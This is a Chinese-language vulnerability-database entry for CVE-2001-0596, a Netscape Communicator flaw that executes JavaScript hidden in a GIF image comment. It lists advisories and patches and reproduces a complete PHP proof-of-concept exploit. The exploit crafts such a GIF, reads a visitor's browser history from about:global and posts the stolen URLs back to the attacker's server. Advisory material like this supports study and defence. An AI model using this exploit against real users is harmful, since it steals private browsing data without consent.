CVE-2001-0596
CVSS7.5
发布时间 :2001-08-02 00:00:00
修订时间 :2016-10-17 22:11:33
NMCOE    

[原文]Netscape Communicator before 4.77 allows remote attackers to execute arbitrary Javascript via a GIF image whose comment contains the Javascript.


[CNNVD]Netscape Navigator 'about:'Domain信息泄露漏洞(CNNVD-200108-023)

        Netscape Communicator 4.77之前的版本存在漏洞。远程攻击者借助其注释包含Javascript的GIF图像执行任意Javascript。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0596
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0596
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-023
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000393
(UNKNOWN)  CONECTIVA  CLA-2001:393
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-014-01
(UNKNOWN)  IMMUNIX  IMNX-2001-70-014-01
http://marc.info/?l=bugtraq&m=98685237415117&w=2
(UNKNOWN)  BUGTRAQ  20010409 Netscape 4.76 gif comment flaw
http://www.debian.org/security/2001/dsa-051
(VENDOR_ADVISORY)  DEBIAN  DSA-051
http://www.redhat.com/support/errata/RHSA-2001-046.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:046
http://www.securityfocus.com/bid/2637
(UNKNOWN)  BID  2637
http://xforce.iss.net/static/6344.php
(VENDOR_ADVISORY)  XF  netscape-javascript-access-data(6344)

- 漏洞信息

Netscape Navigator 'about:'Domain信息泄露漏洞
高危 其他
2001-08-02 00:00:00 2005-08-02 00:00:00
远程  
        Netscape Communicator 4.77之前的版本存在漏洞。远程攻击者借助其注释包含Javascript的GIF图像执行任意Javascript。

- 公告与补丁

        The following patches have been released which rectify this issue:
        Netscape Navigator 4.0.8
        
        Netscape Communicator 4.7
        

- 漏洞信息 (20791)

Netscape Navigator 4.0.8 'about:' Domain Information Disclosure Vulnerability (EDBID:20791)
unix remote
2001-04-09 Verified
0 Florian Wesch
N/A [点击下载]
source: http://www.securityfocus.com/bid/2637/info

Due to a flaw in Navigator's security code, all URLs in the about: protocol are considered to be part of the same domain.

If arbitrary Javascript code is placed in a GIF's comment field, it is treated like a normal HTML page. The Javascript code will run from the image information page in the internal about: 'domain'. This issue has also been reported in commented JPEG files. 

<?
/*
Netscape 4.76 gif comment flaw

Florian Wesch <fw@dividuum.de>
http://dividuum.de
*/

$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
if (strlen($self)>64) {
    echo "Url of $self is too long. 64 maximum.<br>";
    echo "You can change this but I think 64 should be enough for anybody ;-)";
    exit;
}

if (!isset($mode)) $mode="intro";

// If urllist is submitted
if (isset($u)) $mode="showhist";

switch ($mode) {
    case "intro":
        ?>
        <html>
            <body>
                <a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
            </body>
        </html>
        <?
        break;
    case "frameset":
        ?>
        <html>
            <frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
                <frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
                <frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
            </frameset>
        </html>
        <?
        break;
    case "loadhistory":
        // replaces the current document with about:global using javascript
        ?>
        <html>
            <base href="about:">
            <form action="global" name="loadhistory">
                <input type="submit">
            </form>
            <script language="javascript">
                document.loadhistory.submit();
            </script>
        </html>
        <?
        break;
    case "showimageinfo":
        ?>
        <html>
            <head>
                <meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
            </head>
            <body>
                Waiting 5 seconds...<br>
                <img src="<? echo $self; ?>?mode=evilgif">
            </body>
        </html>
        <?
        break;
    case "evilgif":
        // Gifs are supposed to be compressed. The program I
        // used sucks :-)
        header("Content-type: image/gif");
        $gif ="4749463839610a000a00f70000ffffffffffccffff";
        $gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
        $gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
        $gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
        $gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
        $gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
        $gif.="fffffffffffffffffffffffffffffffffffffffffff";
        $gif.="fffffffffffffffffffffffffffffffffffffffffff";
        $gif.="fffffffffffffffffffffffffffffffffffffffffff";
        $gif.="ffffffffffffffffffffffff0000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="00000000000000021feff";
        $gif.=bin2hex(sprintf("%77s%s",

      /*"<form action=".$self,' target=_parent name=s method=get >'.*/
      /* I'm using POST so the submitted urls do not appear in the logfile */
        "<form action=".$self,' target=_parent name=s method=post>'.
            '<input name=u>'.
        '</form>'.
        '<script>'.
            'f=parent.frames["foo"].document;'.
            'l="";'.
          /*'for(i=0;i<f.links.length;i++)'.*/
            'for(i=0;i<10            ;i++)'.
                'l+=f.links[i]+"|";'.
            'document.s.u.value=l;'.
            'document.'.chr(255).'s.submit();'.
        '</script>'));

        $gif.=              "00000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="0000000000000000000000000000000000000000000";
        $gif.="00000000000002c000000000a000a00000813004708";
        $gif.="1c48b0a0c18308132a5cc8b061c28000003b";
        echo pack("H".strlen($gif), $gif);
        break;
    case "showhist":
        $urls=explode("|",$u);
        echo "<h1>Top 10 urls in about:global</h1>";
        foreach ($urls as $url) {
            echo "<a href=$url>$url</a><br>";
        }
    };
?>		

- 漏洞信息

5579
Netscape Communicator GIF Comment Arbitrary Script Execution
Remote / Network Access Information Disclosure, Input Manipulation, Misconfiguration
Loss of Confidentiality
Exploit Public

- 漏洞描述

Netscape Communicator and Netscape Navigator contain a flaw that may allow a malicious webmaster to access data on a visiting user's computer. The issue is triggered when arbitrary Javascript code is placed in a GIF's comment field, which is treated like a normal HTML page. It is possible that the flaw may allow access to sensitive information, including the user's browser history, resulting in a loss of confidentiality.

- 时间线

2001-04-09 2001-04-09
2001-04-09 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, RedHat, Debian, Conectiva, Progeny, Immunix and FreeBSD have released patches to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站